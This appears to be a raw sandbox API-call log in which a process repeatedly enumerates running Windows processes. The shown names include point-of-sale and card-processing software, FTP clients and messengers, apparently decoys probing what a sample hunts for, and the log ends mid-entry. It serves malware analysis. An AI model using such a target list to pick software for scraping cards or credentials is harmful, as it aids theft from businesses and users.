[0268.153] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0268.155] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0268.158] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0268.161] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0268.162] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0268.164] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0268.166] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0268.167] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0268.223] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0268.224] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0268.226] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0268.228] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0268.229] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0268.234] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0268.236] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0268.237] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0268.239] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0268.241] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0268.242] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0268.244] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0268.245] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0268.250] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0268.251] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0268.253] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0268.254] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0268.256] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0268.257] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0268.259] CloseHandle (hObject=0x9e0) returned 1 [0268.259] Sleep (dwMilliseconds=0x64) [0268.379] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0268.393] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.395] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0268.396] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0268.398] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.399] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0268.400] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.402] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0268.407] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0268.408] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0268.409] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.411] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.412] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0268.414] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.415] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.416] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.418] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.438] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.439] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.441] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.442] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0268.443] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0268.445] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0268.446] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.448] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0268.449] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0268.453] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0268.455] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0268.456] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.457] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0268.459] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0268.460] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0268.462] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0268.463] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0268.464] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0268.468] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0268.469] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0268.471] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0268.472] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0268.474] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0268.475] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0268.476] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0268.478] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0268.479] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0268.529] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0268.531] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0268.533] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0268.534] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0268.536] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0268.537] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0268.538] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0268.540] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0268.541] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0268.543] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0268.544] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0268.546] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0268.547] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0268.549] 